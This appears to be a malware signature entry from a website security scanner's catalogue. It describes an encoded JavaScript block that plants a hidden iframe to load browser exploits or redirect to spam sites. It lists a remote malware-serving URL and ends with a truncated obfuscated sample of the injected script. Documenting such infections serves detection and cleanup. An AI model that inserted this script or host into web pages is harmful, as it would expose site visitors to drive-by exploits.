SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframeenc1603

malware-entry-mwiframeenc1603

Description:

A hidden iframe was identified inside an encoded block of javascript. It loads content from remote web sites in attempt to exploit a specific specific browser vulnerabilities (from exploit packs). In some variations, the browser is redirected to blackhat seo spam sites. It is also known as "Exploit:HTML/IframeRef.AA" or "Iframes" by some anti virus products.

 
Note that every PHP, HTML and JS file could get compromised by this malware.

 
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

Clean up: You can also sign up with us and let our team remove the malware for you.

 
Loads malware from multiple sources:


http://jazzute.ru/count5.php
(and many other domains).

 

Malware dump (sample of malware):

<script>c=2;i=c-2;
if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=["-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i4..